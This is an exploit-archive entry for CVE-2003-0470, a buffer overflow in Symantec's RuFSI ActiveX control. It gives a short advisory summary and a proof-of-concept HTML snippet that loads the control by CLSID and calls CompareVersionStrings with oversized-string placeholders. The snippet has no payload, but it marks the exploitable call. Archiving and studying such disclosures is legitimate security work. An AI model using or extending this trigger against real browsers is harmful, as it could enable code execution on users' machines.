Symantec Security Check RuFSI - ActiveX Control Buffer Overflow
| EKU-ID: 28287 | CVE: CVE-2003-0470;OSVDB-2208 | OSVDB-ID: |
| Author: Cesar Cerrudo | Published: 2003-06-23 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28287 | CVE: CVE-2003-0470;OSVDB-2208 | OSVDB-ID: |
| Author: Cesar Cerrudo | Published: 2003-06-23 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/8008/info
It has been reported that the RuFSI Utility Class is vulnerable to a boundary condition error when invoked with long strings. This could potentially lead to the execution of code with the privileges of the user executing the web browser.
<object classid="clsid:69DEAF94-AF66-11D3-BEC0-00105AA9B6AE" id="test">
</object>
<script>
test.CompareVersionStrings("long string here","or long string here")
</script>